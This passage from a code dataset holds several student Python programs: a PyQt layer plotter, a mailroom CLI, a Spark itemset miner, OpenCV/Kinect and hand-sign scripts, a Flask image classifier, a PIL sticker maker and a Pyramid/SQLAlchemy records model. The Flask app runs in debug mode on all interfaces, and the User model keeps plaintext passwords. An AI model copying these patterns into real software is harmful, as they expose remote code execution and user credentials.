Path(layer_data[i])\r\n patch = patches.PathPatch(path)\r\n axes.add_patch(patch)\r\n art3d.pathpatch_2d_to_3d(patch, z=j, zdir='z')\r\n \r\n ylim = self.image_converter.img_getheight() +100\r\n xlim = self.image_converter.img_getWidth() + 100\r\n axes.set_xlim([0, xlim]) #2125\r\n axes.set_ylim([0, ylim]) #2125\r\n axes.set_zlim([0,layers + 10])\r\n major_ticks = np.arange(0, xlim, 100)\r\n minor_ticks = np.arange(0, ylim, 5)\r\n\r\n axes.set_xticks(major_ticks)\r\n axes.set_xticks(minor_ticks, minor=True)\r\n axes.set_yticks(major_ticks)\r\n axes.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n axes.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n axes.grid(which='minor', alpha=0.2)\r\n axes.grid(which='major', alpha=0.5)\r\n return axes\r\n def draw2d(self,axes,layer):\r\n axes.clear()\r\n layer_data = self.image_converter.getlayer_data(layer)\r\n for i in range(0,len(layer_data)):\r\n path = Path(layer_data[i])\r\n patch = patches.PathPatch(path)\r\n axes.add_patch(patch)\r\n ylim = self.image_converter.img_getheight() +100\r\n xlim = self.image_converter.img_getWidth() + 100\r\n axes.set_xlim([0, xlim]) #2125\r\n axes.set_ylim([0, ylim]) #2125\r\n \r\n major_ticks = np.arange(0, xlim, 100)\r\n minor_ticks = np.arange(0, ylim, 5)\r\n\r\n axes.set_xticks(major_ticks)\r\n axes.set_xticks(minor_ticks, minor=True)\r\n axes.set_yticks(major_ticks)\r\n axes.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n axes.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n axes.grid(which='minor', alpha=0.2)\r\n axes.grid(which='major', alpha=0.5)\r\n \r\n return axes\r\n \r\n \r\n#if __name__.endswith('__main__'):\r\n #m = Main_PROGRAM()\r\n # m.link_ui()\r\nif __name__=='__main__':\r\n \r\n app = QtWidgets.QApplication(sys.argv)\r\n \r\n# file = QtCore.QFile(\"dark.qss\")\r\n# file.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text)\r\n# stream = QtCore.QTextStream(file)\r\n# app.setStyleSheet(stream.readAll())\r\n \r\n \r\n m = Main_PROGRAM()\r\n\r\n \r\n app.aboutToQuit.connect(m.close_connection)\r\n sys.exit(app.exec_())\r\n #sys.exit(app.exec_())\r\n #app.aboutToQuit.connect(sys.exit(app.exec_()) )\r\n #m.MainWindow.show()\r\n# if app.exec_() ==0 and m.check_connection == True:\r\n# \r\n# m.close_connection()\r\n# print(\"closed\")\r\n \r\n ","sub_path":"Main_PROGRAM.py","file_name":"Main_PROGRAM.py","file_ext":"py","file_size_in_byte":25467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"462327521","text":"#Lesson09\n#Objected Oriented Mailroom Exercise 09 - CLI Menu\n#\n#!/usr/bin/env python3\n#importe modules\nfrom donor_models import *\nfrom pathlib import Path\nfrom sys import exit\nimport os\n\n## OK so this ended up turning more into a config file than the menu cli since\n# the menus were all created as classes in the donor_models.py file.\n\n\n\n#define variables\n\ndata_folder = r'C:\\pythonuw\\Fall2018-PY210A\\students\\ericstreit\\files'\n# note to self: make another one like above for the instructor that points to the current folder?\n\n#define menus\n# This creates the menu as a class\n\n#should the other menus be subclasses??? probably! (DONE!)\n\nmain_menu = Menu(\"MAIN MENU\")\nreport_menu = Report(\"REPORT MENU\")\nthankyou_menu = ThankYou(\"SEND A THANK YOU\")\n\n\n# define menu options\n# These are the choices that will display to the user in a menu\n# Be sure to create a dictionary below that will tie to the choices\n\nmain_menu.menu_options = [\"(R)eport Menu\", \"(S)end a Thank You\",\n \"(A)dd a new donation\",\n \"(Q)uit\"]\n\n\nreport_menu.menu_options = [\"Create report of (A)ll donors\",\n \"Create report of a (S)ingle donor\",\n \"(B)ack to Main Menu\",\n \"(Q)uit\"]\n\n\n\nthankyou_menu.menu_options = [\"Send a Thank You to a (S)ingle donor\",\n \"Send a Thank You to (A)ll donors\",\n \"(B)ack to Main Menu\",\n \"(Q)uit\"]\n\n\n\n#define the menu dictionaries\n#each selection should point to a function\n\nmain_menu.dict = {\"r\": report_menu.menu, \"s\": thankyou_menu.menu, \"a\": main_menu.new_donation, \"q\": main_menu.quit}\nreport_menu.dict = {\"a\": report_menu.full_donor_report, \"s\": report_menu.single_donor_report, \"b\": main_menu.menu, \"q\": report_menu.quit}\nthankyou_menu.dict = {\"a\": thankyou_menu.all_donor_thankyou, \"s\": thankyou_menu.single_donor_thankyou, \"b\": main_menu.menu, \"q\": thankyou_menu.quit}\n\n#let's put some donors in here for testing!\n\nhestershaw = Donors(\"Hester Shaw\")\ndonor_dict['hestershaw'] = hestershaw\nhestershaw.add_donations(500)\nhestershaw.add_donations(34)\n\ngrike = Donors(\"Grike\")\ndonor_dict['grike'] = grike\ngrike.add_donations(3)\n\ntomnatsworthy = Donors(\"Tom Natsworthy\")\ndonor_dict['tomnatsworthy'] = tomnatsworthy\ntomnatsworthy.add_donations(1003)\ntomnatsworthy.add_donations(745)\ntomnatsworthy.add_donations(10)\n\n# run the program!\n\nmain_menu.menu()\n\n#for testing\nif __name__==\"__main__\":\n main_menu.menu\n","sub_path":"students/ericstreit/session09/cli_main.py","file_name":"cli_main.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"569757828","text":"from itertools import combinations\nimport math\nfrom operator import add\nfrom pyspark import SparkContext\nimport sys\nimport time\n\n\ndef get_C1(dataset):\n\n C1 = dict()\n for li in dataset:\n for element in li:\n if element not in C1:\n C1[element] = 1\n else:\n C1[element] += 1\n\n return C1\n\n\ndef Lk_to_Ck(dataset, Lk, k):\n\n Ck = dict()\n for li in dataset:\n li = sorted(set(li) & set(Lk))\n #print('li:', li)\n for item in combinations(li, k):\n item = tuple(item)\n if item not in Ck:\n Ck[item] = 1\n else:\n Ck[item] += 1\n\n return Ck\n\n\ndef Ck_to_Lk(Ck, support):\n\n Lk = list()\n for key, val in Ck.items():\n if val >= support:\n Lk.append(key)\n\n return sorted(Lk)\n\n\ndef find_candidates(dataset, support, whole_size):\n\n frequent_itemsets = []\n\n # initialize partition support threshold\n partition = list(dataset)\n p = len(partition) / whole_size\n ps = math.ceil(p * support)\n\n # get all singletons\n C1 = get_C1(partition)\n #print('C1:', C1)\n L1 = Ck_to_Lk(C1, ps)\n # str to tuple\n frequent_itemsets.append([(item,) for item in L1])\n\n # initialize combination length\n k = 2\n\n while True:\n #print('L1:',L1)\n Ck = Lk_to_Ck(partition, L1, k)\n #print('Ck:',Ck)\n Lk = Ck_to_Lk(Ck, ps)\n if Lk == []:\n break\n frequent_itemsets.append(Lk)\n # update L1\n L1 = set()\n for item in Lk:\n L1 = L1 | set(item)\n k += 1\n\n return frequent_itemsets\n\n\ndef find_frequent_itemsets(dataset, candidates):\n\n result_dict = dict()\n for li in dataset:\n for item in candidates:\n if set(item).issubset(li):\n if item not in result_dict:\n result_dict[item] = 1\n else:\n result_dict[item] += 1\n\n result_li = [(key, value) for key, value in result_dict.items()]\n\n return result_li\n\n\ndef format(data):\n\n result = ''\n length = 1\n for item in data:\n if len(item) == 1:\n result += str(item).replace(',', '') + ','\n elif len(item) == length:\n result += str(item) + ','\n else:\n result += '\\n\\n'\n result += str(item) + ','\n length = len(item)\n\n result = result.replace(',\\n\\n', '\\n\\n')[:-1]\n\n return result\n\n\nif __name__ == '__main__':\n start = time.time()\n case_number = sys.argv[1]\n support = int(sys.argv[2])\n input_file_path = sys.argv[3]\n output_file_path = sys.argv[4]\n\n sc = SparkContext.getOrCreate()\n\n # Generate basket model\n rdd = sc.textFile(input_file_path)\n header = rdd.first()\n\n if case_number == '1':\n new_rdd = rdd.filter(lambda x: x != header) \\\n .map(lambda x: (x.split(',')[0], x.split(',')[1])) \\\n .groupByKey() \\\n .map(lambda x: list(set(x[1])))\n elif case_number == '2':\n new_rdd = rdd.filter(lambda x: x != header) \\\n .map(lambda x: (x.split(',')[1], x.split(',')[0])) \\\n .groupByKey() \\\n .map(lambda x: list(set(x[1])))\n\n whole_size = new_rdd.count()\n\n # Phase 1\n candidates = new_rdd.mapPartitions(lambda partition: find_candidates(partition, support, whole_size)) \\\n .flatMap(lambda x: x) \\\n .distinct() \\\n .sortBy(lambda x: (len(x), x)).collect()\n\n #print(candidates)\n\n # Phase 2\n frequent_itemsets = new_rdd.mapPartitions(lambda partition: find_frequent_itemsets(partition, candidates)) \\\n .reduceByKey(add) \\\n .filter(lambda x: x[1] >= support) \\\n .map(lambda x: x[0]) \\\n .sortBy(lambda x: (len(x), x)).collect()\n\n #print(frequent_itemsets)\n\n with open(output_file_path, 'w+') as fout:\n fout.write('Candidates:\\n' + format(candidates) + '\\n\\n' + 'Frequent Itemsets:\\n' + format(frequent_itemsets))\n\n end = time.time()\n print('Duration: {}'.format(end - start))\n\n","sub_path":"HW2-FrequentItemsets/src/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"23939806","text":"import sys\nimport cv2\nimport numpy as np\nimport freenect\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n# def mouse_callback(event,x,y,flags,param):\n# \tr = img[y][x][2]\n# \tg = img[y][x][1]\n# \tb = img[y][x][0]\n# \th = hsv[y][x][0]\n# \ts = hsv[y][x][1]\n# \tv = hsv[y][x][2]\n# \toutput_rgb = \"R:%d, G:%d, B:%d \" % (r, g, b)\n# \toutput_hsv = \"H:%d, S:%d, V:%d\" % (h, s, v)\n# \ttmp = hsv.copy()\n# \tcv2.putText(tmp,output_rgb, (10,20), font, 0.5, (0,0,0))\n# \tcv2.putText(tmp,output_hsv, (10,40), font, 0.5, (0,0,0))\n# \tcv2.imshow('window', tmp)\n# \tif event == cv2.EVENT_LBUTTONDOWN:\n# \t\tprint \"bgr: (%d, %d, %d) \\nhsv: (%d, %d, %d)\" % (b,g,r,h,s,v)\n\n#############################################################################\n\n# STARTING THE PROGRAM HERE #\n\n\n# Loading the frame from the Kinect Camera\nimg = freenect.sync_get_video()[0]\n\n# Converting the Camera frame from RGB to HSV\nbgr_frame = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\nhsv = cv2.cvtColor(bgr_frame, cv2.COLOR_BGR2HSV)\n\n# Storing the HSV range for the colors to be thresholded\n\ncolor_order=['yellow','orange','pink','black','blue','green','purple','red']\ncolor_lower_array=np.array([[0,0,0],[0,100,170],[165,90,210],[0,20,20],[20,110,20],[40,5,88],[140,70,80],[169,120,120]])\ncolor_higher_array=np.array([[200,255,255],[40,255,210],[173,215,255],[180,110,80],[110,130,80],[80,150,200],[160,150,210],[180,255,210]])\n\n# Performing Operations on camera frames to process the output for all the colors\n\nfor i in range(0,len(color_lower_array)):\n# \t# Thresholding the image\n\tmask = cv2.inRange(hsv, color_lower_array[i], color_higher_array[i])\n\n# \t# Performing Morphological Operations on image\n\topening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_RECT,(1,1)))\n\tclosing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_RECT,(1,1)))\n\n# \t# Detecting the contours\n\tim2, contours, hierarchy = cv2.findContours(closing, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n\tprint (contours)\n# \t# Find the largest contour\n\t# contour_sizes = [(cv2.contourArea(contour), contour) for contour in contours]\n\t# biggest_contour = max(contour_sizes, key=lambda x: x[0])[1]\n\n# \t# Drawing the largest contour\n\t# cv2.drawContours(img, contours, -1, (255,255,0), 3)\n\n# \t# Drawing a bounding rectangle for the detected box\n# \trect = cv2.minAreaRect(biggest_contour)\n# \tbox = cv2.boxPoints(rect)\n# \tbox = np.int0(box)\n# \tcenter=rect[0]\n# \tangle = rect[2]\n# \tcv.drawContours(img,[box],0,(0,0,255),2)\n\n# \t# Marking the center of the box\n# \timg[int(center[1])-2:int(center[1])+2,int(center[0])-2:int(center[0])+2]=[0,0,255]\n\n# \t# Determining the rotation matrice\n# \trows, cols = img.shape[:2]\n# \trot = cv2.getRotationMatrix2D(center, angle-90, 1)\n# \tprint(rot)\n# \t# img = cv.warpAffine(img, rot, (rows,cols))\n\n# \t# Center of Mass of the detected contour\n# \t# M = cv.moments(biggest_contour)\n# \t# print(\"M is\", M )\n\n# \t# cx = int(M['m10']/M['m00'])\n# \t# cy = int(M['m01']/M['m00'])\n\n# \t# # Printing the COM coordinates of the detected object\n# \t# print (\"Cx is \", cx)\n# \t# print (\"Cy is \", cy)\n\n# \t# # Marking the COMon the image\n# \t# img[cy-2:cy+2,cx-2:cx+2]=[0,0,255]\n\ncv2.namedWindow(\"window\",cv2.WINDOW_AUTOSIZE)\ncv2.imshow('window', closing)\n\n# cv2.setMouseCallback(\"window\",mouse_callback)\n\nwhile True:\n\tch = 0xFF & cv2.waitKey(10)\n\tif ch == 0x1B:\n\t\tbreak\ncv2.destroyAllWindows()","sub_path":"blob_kinect.py","file_name":"blob_kinect.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578332140","text":"from flask import Flask\nfrom flask import request\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\nimport json\napp = Flask(__name__)\n\n@app.route(\"/predict\",methods=[\"POST\"])\ndef predict():\n model = torch.hub.load('pytorch/vision:v0.4.2', 'densenet121', pretrained=True)\n model.eval()\n filename = request.files['file']\n input_image = Image.open(filename)\n data_preprocessing = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n scores = model(data_preprocessing(input_image).unsqueeze(0))\n class_prob = torch.nn.functional.softmax(scores[0], dim=0)\n class_ids = json.load(open(\"app/imagenet_class_index.json\"))\n labels = [class_ids[str(k)][1] for k in range(len(class_ids))]\n predicted_labels = {}\n count = 1\n for id in class_prob.sort()[1][-10:]:\n predicted_labels[count] = labels[id]\n count += 1\n return predicted_labels\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',debug=True)","sub_path":"project-3-group-7/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"109172906","text":"# -*- coding: utf-8 -*-\n\nimport time\n\nimport cv2\nimport numpy as np\nimport torch\n\nfrom cnn import load_model\nfrom image import crop_square_region, normalize_image_input\nfrom segmentation_main import getContours, segmentation_contour\nfrom testing import find_sign_group, predict_sign\nfrom vlc_media_player import VLCController\n\n\ndef main():\n # Contrôle de VLC\n vlc_control = VLCController(DELAY=3)\n\n # Use Webcam\n webcam = cv2.VideoCapture(0) # Seule caméra est celle de l'ordi\n webcam.set(cv2.CAP_PROP_FRAME_WIDTH, 640) # id pour le nombre de pixel I guess\n webcam.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) # id pour le nombre de pixel I guess\n webcam.set(cv2.CAP_PROP_BRIGHTNESS, 75) # id pour le brightness\n # Load CNN model\n model = load_model(\"0.9392_HandyNet_1607802541.3999255\")[0]\n\n while True:\n # Capture image from webcam\n sucess, image = webcam.read()\n capture = cv2.flip(image.copy(), flipCode=1)\n sign = None\n\n # Return image of just the hand\n try:\n image_hand = segmentation_contour(capture)\n cv2.imshow(\"Image main\", image_hand)\n # print(\"Taille image: {}\".format(image_hand.shape))\n sign = predict_sign(model, image_hand, threshold=0.7)\n except Exception as e:\n print(e)\n\n group = find_sign_group(sign)\n\n capture = cv2.putText(\n capture,\n f\"{sign} {str(group)}\",\n (10, capture.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX,\n 2,\n (0, 0, 255),\n thickness=3,\n )\n cv2.imshow(\"Image\", capture)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n\n vlc_control.run(group)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"582107428","text":"import asyncio\nfrom PIL import Image, ImageDraw, ImageFont\nfrom datetime import date\n\n\nasync def stick_maker_static_traitor(\n text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:\n \"\"\"\n 有内鬼表情包模板\n \"\"\"\n def __handle() -> Image.Image:\n # 初始化背景图层\n background = Image.new(mode=\"RGB\", size=(image_wight, image_height), color=(255, 255, 255))\n\n # 处理文字层 字数部分\n text_num_img = Image.new(mode=\"RGBA\", size=(image_wight, image_height), color=(0, 0, 0, 0))\n font_num_size = 48\n font_num = ImageFont.truetype(font_path, font_num_size)\n ImageDraw.Draw(text_num_img).text(xy=(0, 0), text=f'{len(text)}/100', font=font_num, fill=(255, 255, 255))\n\n # 处理文字层 主体部分\n text_main_img = Image.new(mode=\"RGBA\", size=(image_wight, image_height), color=(0, 0, 0, 0))\n font_main_size = 54\n font_main = ImageFont.truetype(font_path, font_main_size)\n # 按长度切分文本\n spl_num = 0\n spl_list = []\n for num in range(len(text)):\n text_w = font_main.getsize_multiline(text[spl_num:num])[0]\n if text_w >= 415:\n spl_list.append(text[spl_num:num])\n spl_num = num\n else:\n spl_list.append(text[spl_num:])\n test_main_fin = ''\n for item in spl_list:\n test_main_fin += item + '\\n'\n ImageDraw.Draw(text_main_img).multiline_text(xy=(0, 0), text=test_main_fin, font=font_main, spacing=8,\n fill=(0, 0, 0))\n\n # 处理文字部分旋转\n text_num_img = text_num_img.rotate(angle=-9, expand=True, resample=Image.BICUBIC, center=(0, 0))\n text_main_img = text_main_img.rotate(angle=-9.5, expand=True, resample=Image.BICUBIC, center=(0, 0))\n\n # 向模板图片中置入文字图层\n background.paste(im=image_file, box=(0, 0))\n background.paste(im=text_num_img, box=(435, 140), mask=text_num_img)\n background.paste(im=text_main_img, box=(130, 160), mask=text_main_img)\n return background\n\n loop = asyncio.get_running_loop()\n result = await loop.run_in_executor(None, __handle)\n return result\n\n\nasync def stick_maker_static_jichou(\n text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:\n \"\"\"\n 记仇表情包模板\n \"\"\"\n def __handle() -> Image.Image:\n # 处理文本主体\n text_ = f\"今天是{date.today().strftime('%Y年%m月%d日')}{text}, 这个仇我先记下了\"\n font_main_size = 42\n font_main = ImageFont.truetype(font_path, font_main_size)\n # 按长度切分文本\n spl_num = 0\n spl_list = []\n for num in range(len(text_)):\n text_w = font_main.getsize_multiline(text_[spl_num:num])[0]\n if text_w >= (image_wight * 7 // 8):\n spl_list.append(text_[spl_num:num])\n spl_num = num\n else:\n spl_list.append(text_[spl_num:])\n text_main_fin = '\\n'.join(spl_list)\n\n font = ImageFont.truetype(font_path, font_main_size)\n text_w, text_h = font.getsize_multiline(text_main_fin)\n\n # 处理图片\n background_w = image_wight\n background_h = image_height + text_h + 20\n background = Image.new(mode=\"RGB\", size=(background_w, background_h), color=(255, 255, 255))\n\n # 处理粘贴位置 顶头\n image_coordinate = (0, 0)\n background.paste(image_file, image_coordinate)\n\n draw = ImageDraw.Draw(background)\n # 计算居中文字位置\n text_coordinate = (((background_w - text_w) // 2), image_height + 5)\n draw.multiline_text(text_coordinate, text_main_fin, font=font, fill=(0, 0, 0))\n return background\n\n loop = asyncio.get_running_loop()\n result = await loop.run_in_executor(None, __handle)\n return result\n\n\nasync def stick_maker_static_phlogo(\n text: str, image_file: Image.Image, font_path: str, image_wight: int, image_height: int) -> Image.Image:\n \"\"\"\n ph表情包模板\n \"\"\"\n def __handle() -> Image.Image:\n # 处理文本主体\n test_sentences = text.strip().split(maxsplit=1)\n white_text = test_sentences[0]\n yellow_text = test_sentences[1]\n\n font_size = 640\n font = ImageFont.truetype(font_path, font_size)\n text_w, text_h = font.getsize(text)\n\n y_text_w, y_text_h = font.getsize(yellow_text)\n bg_y_text = Image.new(mode=\"RGB\", size=(round(y_text_w * 1.1), round(text_h * 1.3)), color=(254, 154, 0))\n draw_y_text = ImageDraw.Draw(bg_y_text)\n draw_y_text.text((round(y_text_w * 1.1) // 2, round(text_h * 1.3) // 2),\n yellow_text, anchor='mm', font=font, fill=(0, 0, 0))\n radii = 64\n # 画圆(用于分离4个角)\n circle = Image.new('L', (radii * 2, radii * 2), 0) # 创建黑色方形\n draw_circle = ImageDraw.Draw(circle)\n draw_circle.ellipse((0, 0, radii * 2, radii * 2), fill=255) # 黑色方形内切白色圆形\n # 原图转为带有alpha通道(表示透明程度)\n bg_y_text = bg_y_text.convert(\"RGBA\")\n y_weight, y_height = bg_y_text.size\n # 画4个角(将整圆分离为4个部分)\n alpha = Image.new('L', bg_y_text.size, 255) # 与img同大小的白色矩形,L 表示黑白图\n alpha.paste(circle.crop((0, 0, radii, radii)), (0, 0)) # 左上角\n alpha.paste(circle.crop((radii, 0, radii * 2, radii)), (y_weight - radii, 0)) # 右上角\n alpha.paste(circle.crop((radii, radii, radii * 2, radii * 2)), (y_weight - radii, y_height - radii)) # 右下角\n alpha.paste(circle.crop((0, radii, radii, radii * 2)), (0, y_height - radii)) # 左下角\n bg_y_text.putalpha(alpha) # 白色区域透明可见,黑色区域不可见\n\n w_text_w, w_text_h = font.getsize(white_text)\n bg_w_text = Image.new(mode=\"RGB\", size=(round(w_text_w * 1.05), round(text_h * 1.3)), color=(0, 0, 0))\n w_weight, w_height = bg_w_text.size\n draw_w_text = ImageDraw.Draw(bg_w_text)\n draw_w_text.text((round(w_text_w * 1.025) // 2, round(text_h * 1.3) // 2),\n white_text, anchor='mm', font=font, fill=(255, 255, 255))\n\n text_bg = Image.new(mode=\"RGB\", size=(w_weight + y_weight, y_height), color=(0, 0, 0))\n text_bg.paste(bg_w_text, (0, 0))\n text_bg.paste(bg_y_text, (round(w_text_w * 1.05), 0), mask=alpha)\n t_weight, t_height = text_bg.size\n\n background = Image.new(mode=\"RGB\", size=(round(t_weight * 1.2), round(t_height * 1.75)), color=(0, 0, 0))\n b_weight, b_height = background.size\n background.paste(text_bg, ((b_weight - t_weight) // 2, (b_height - t_height) // 2))\n return background\n\n loop = asyncio.get_running_loop()\n result = await loop.run_in_executor(None, __handle)\n return result\n\n\n__all__ = [\n 'stick_maker_static_traitor',\n 'stick_maker_static_jichou',\n 'stick_maker_static_phlogo'\n]\n","sub_path":"omega_miya/plugins/sticker_maker/utils/static_render.py","file_name":"static_render.py","file_ext":"py","file_size_in_byte":7176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"48762702","text":"# -*- coding: latin-1 -*-\n\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom .textmodel.textmodel import TextModel\nfrom .textmodel.texeltree import NULL_TEXEL\n\nfrom .nbtexels import Cell, TextCell, ScriptingCell, mk_textmodel\n\nimport re\n\n\ndef get_cells(texel):\n if isinstance(texel, Cell):\n return [texel]\n r = []\n for i1, i2, child in texel.iter_childs():\n r.extend(get_cells(child))\n return r\n\n\ndef totext(model):\n r = []\n for cell in get_cells(model.texel):\n if isinstance(cell, TextCell):\n text = cell.text.get_text()\n r.append(\"[Text]:\\n\"+text)\n else:\n text = cell.input.get_text()\n if text:\n r.append((\"[In %i]:\\n\"%cell.number)+text)\n text = cell.output.get_text()\n if text:\n r.append((\"[Out %i]:\\n\"%cell.number)+text)\n return u\"\\n\".join(r)\n\n\nrx_out = re.compile('\\[Out\\s*(\\w*)\\]\\:$').match\nrx_in = re.compile('\\[In\\s*(\\w*)\\]\\:$').match\nrx_text = re.compile('\\[Text\\]\\:$').match\n\ndef fromtext(s, ScriptingCell=ScriptingCell):\n model = TextModel()\n cells = []\n l = []\n fields = [NULL_TEXEL, NULL_TEXEL]\n mode = None\n number = None\n IN = \"IN\"\n OUT = \"OUT\"\n TEXT = \"TEXT\"\n\n def create_texel():\n texel = TextModel(u'\\n'.join(l)).texel\n del l[:]\n return texel\n\n def flush():\n texel = create_texel()\n if not mode:\n return\n if mode == TEXT:\n cell = TextCell(texel)\n else:\n if mode == IN:\n fields[0] = texel\n else:\n fields[1] = texel\n cell = ScriptingCell(*fields)\n fields[0] = fields[1] = NULL_TEXEL\n cells.append(cell)\n\n \n for line in s.split('\\n'):\n if rx_in(line):\n flush()\n mode = IN\n elif rx_out(line):\n if mode != IN:\n flush()\n else:\n fields[0] = create_texel()\n mode = OUT\n elif rx_text(line):\n flush()\n mode = TEXT\n else:\n l.append(line)\n if l:\n flush()\n model = TextModel()\n for cell in cells:\n model.append(mk_textmodel(cell))\n return model\n\n\ndef test_00():\n text = \"\"\"[In 1]:\n1+2\n[Out 2]:\n3\n[Text]:\nZeile 1\nZeile 2\n\"\"\"\n m = fromtext(text)\n #m.texel.dump()\n print(totext(m))\n t = totext(m)\n print(repr(text))\n print(repr(t))\n assert t == text\n","sub_path":"pynotebook/pynotebook/textformat.py","file_name":"textformat.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344368768","text":"def checkGroup(person_set, groups):\n # 나중에 포함되는 그룹을 묶기 위해 각 인덱스를 모아준다.\n idxs = []\n\n for idx, group in enumerate(groups):\n # 일단 각 그룹을 돌면서 교차하는게 있으면 그룹을 업데이트\n if len(person_set & group) > 0:\n # 인덱스도 idxs에 추가\n idxs.append(idx)\n # 기존 그룹은 합친걸로 교체\n groups[idx] = group | person_set\n\n # 예로,\n # 초기엔 {1,2} {4,5} 처럼 두개 그룹이다가 {2,4}를 넣고 난 이후에 겹치는 경우가 생김\n # 이후 겹치는게 두개 이상 인지 확인 => {1,2,4} {2,4,5} => 두개를 합쳐야함\n if len(idxs) > 1:\n\n # 새로운 그룹을 만들어서\n new_group = set()\n # 모아놓은 인덱스들을 거꾸로 돌면서 (앞에서부터 제거하면 인덱스순서가 달라지니까)\n for i in idxs[::-1]:\n # 새로운 그룹에 합치고\n new_group = new_group | groups[i]\n # 기존 그룹은 그룹들에서 제거\n groups.pop(i)\n\n # 새로합친 그룹을 그룹들에 추가\n groups.append(new_group)\n\n # 겹치는게 없을땐 단순하게 그룹들에 추가\n if not idxs:\n groups.append(person_set)\n\n return groups\n\n\nT = int(input())\n\nfor t in range(1, T+1):\n N, M = map(int, input().split())\n\n groups = []\n\n # 모든 사람을 먼저 그룹에 넣자\n for p in range(1, N+1):\n groups.append({str(p)})\n\n # 케이스마다 그룹 체킹\n for _ in range(M):\n a, b = input().split()\n\n groups = checkGroup({a, b}, groups)\n\n print(f\"#{t} {len(groups)}\")\n","sub_path":"PYTHON/SWEXPERT/7465_창용마을무리의개수/7645_1.py","file_name":"7645_1.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"233420552","text":"from pyramid.authentication import AuthTktAuthenticationPolicy\r\nfrom pyramid.authorization import ACLAuthorizationPolicy\r\nfrom pyramid.config import Configurator\r\nfrom pyramid.httpexceptions import HTTPForbidden, HTTPFound, HTTPNotFound\r\nfrom pyramid.view import forbidden_view_config, view_config\r\nfrom pyramid.security import ALL_PERMISSIONS, Allow, Deny, Authenticated, authenticated_userid, forget, remember, effective_principals\r\n\r\nfrom sqlalchemy import create_engine, Column, Integer, String, ForeignKey\r\nfrom sqlalchemy.orm import sessionmaker, relationship, backref\r\nfrom datetime import datetime\r\n\r\nengine = create_engine('sqlite:///studentRecordSystem.db', echo=True)\r\n# engine = create_engine('sqlite:///studentRecordSystem.db?check_same_thread=False')\r\n\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nBase = declarative_base()\r\n\r\n### DEFINE MODEL\r\nclass Association(Base):\r\n __tablename__ = 'association'\r\n class_id = Column(Integer, ForeignKey('classes.id'), primary_key=True)\r\n student_id = Column(Integer, ForeignKey('students.id'), primary_key=True)\r\n grade = Column(String(2))\r\n status = Column(String(9))\r\n theClass = relationship(\"Class\")\r\n \r\nclass Student(Base):\r\n __tablename__ = 'students'\r\n id = Column(Integer, primary_key=True)\r\n forename = Column(String(20), nullable=False)\r\n surname = Column(String(20), nullable=False)\r\n address = Column(String(50), nullable=False)\r\n classlist = relationship(\"Association\")\r\n interventionlist = relationship(\"Intervention\", backref='students')\r\n\r\nclass Class(Base):\r\n __tablename__ = 'classes'\r\n id = Column(Integer, primary_key=True)\r\n name = Column(String(20), nullable=False)\r\n teacher_id = Column(Integer, ForeignKey('teachers.id')) \r\n students = relationship(\"Student\", secondary=\"association\",\r\n backref=\"classes\")\r\n \r\nclass Intervention(Base):\r\n __tablename__ = 'interventions'\r\n id = Column(Integer, primary_key=True)\r\n date_time = Column(String(15))\r\n content = Column(String(300), nullable=False)\r\n teacher_id = Column(Integer, ForeignKey('teachers.id'))\r\n student_id = Column(Integer, ForeignKey('students.id'))\r\n made_by = relationship(\"Teacher\")\r\n applies_to = relationship(\"Student\")\r\n\r\nclass User(Base):\r\n __tablename__ = 'users'\r\n id = Column(Integer, primary_key=True)\r\n title = Column(String(4), nullable=False)\r\n surname = Column(String(20), nullable=False)\r\n username = Column(String(10), nullable=False)\r\n password = Column(String(8), nullable=False)\r\n\r\n # Method of User object\r\n def check_password(self, passwd):\r\n return self.password == passwd\r\n \r\nclass Administrator(User):\r\n __tablename__ = 'administrators'\r\n id = Column(Integer, ForeignKey(\"users.id\"), primary_key=True)\r\n \r\nclass Teacher(User):\r\n __tablename__ = 'teachers'\r\n 